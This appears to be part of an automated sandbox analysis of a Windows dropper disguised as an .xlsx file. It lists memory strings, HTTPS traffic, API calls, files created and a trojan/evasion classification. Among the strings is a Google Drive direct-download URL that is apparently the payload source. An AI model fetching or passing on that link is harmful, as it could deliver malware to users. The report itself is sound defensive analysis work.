      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971881403.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029830127.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloadq
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971881403.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029830127.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloadsc
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloadt
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloadtC
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2466810418.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2222675341.0000000007374000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2466765757.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2331421259.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2628884404.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249757292.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2084014689.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971863163.0000000007375000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2413081299.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195091390.0000000007375000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2057485924.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2167654319.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195054189.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2574815814.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2494127726.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2277302457.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.0000000007374000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971819578.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2304054986.0000000007375000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2602231584.0000000007374000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2358849652.0000000007373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloady
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029779940.0000000007377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1722047455.0000000007336000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2628884404.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971881403.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971863163.0000000007375000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2656217920.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1945095137.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1750603166.000000000737A000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971819578.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2602231584.0000000007374000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738143957.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029830127.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711387950.0000000007373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1722047455.0000000007336000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2628884404.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971881403.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971863163.0000000007375000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2656217920.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1945095137.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1750603166.000000000737A000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971819578.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2602231584.0000000007374000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738143957.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029830127.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711387950.0000000007373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1722047455.0000000007336000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2628884404.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971881403.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971863163.0000000007375000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2656217920.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1945095137.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1750603166.000000000737A000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971819578.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2602231584.0000000007374000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738143957.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029830127.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711387950.0000000007373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029779940.0000000007377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029779940.0000000007377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029779940.0000000007377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029779940.0000000007377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
      Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49709 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.8:49711 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49712 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.8:49721 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49725 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49727 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49758 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49771 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49783 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.8:49793 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49800 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.8:49806 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49812 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49856 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49869 version: TLS 1.2
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 0_2_00405331 GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,LdrInitializeThunk,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405331
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 0_2_0040335A EntryPoint,LdrInitializeThunk,#17,SetErrorMode,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,LdrInitializeThunk,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040335A
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 2_2_0040335A EntryPoint,LdrInitializeThunk,#17,SetErrorMode,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,LdrInitializeThunk,GetCurrentProcess,ExitWindowsEx,ExitProcess,2_2_0040335A
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeFile created: C:\Windows\resources\0809Jump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 0_2_00404B6E0_2_00404B6E
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 0_2_0040659D0_2_0040659D
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 2_2_00404B6E2_2_00404B6E
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 2_2_0040659D2_2_0040659D
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: String function: 00402B3A appears 49 times
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000000.00000000.1483122569.000000000044A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebiliousnesses.exeDVarFileInfo$ vs 09-FD-94.03.60.175.07.xlsx.exe
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebiliousnesses.exeDVarFileInfo$ vs 09-FD-94.03.60.175.07.xlsx.exe
      Source: 09-FD-94.03.60.175.07.xlsx.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal76.troj.evad.winEXE@3/10@2/2
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 0_2_00404635 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,LdrInitializeThunk,MulDiv,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,SetDlgItemTextW,0_2_00404635
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 0_2_0040206A LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,LdrInitializeThunk,0_2_0040206A
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeFile created: C:\Users\user\subacidity.lnkJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeFile created: C:\Users\user\AppData\Local\Temp\nsxC3B3.tmpJump to behavior
      Source: 09-FD-94.03.60.175.07.xlsx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: 09-FD-94.03.60.175.07.xlsx.exeReversingLabs: Detection: 55%
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeFile read: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeProcess created: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeProcess created: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"Jump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: shfolder.dllJump to behavior
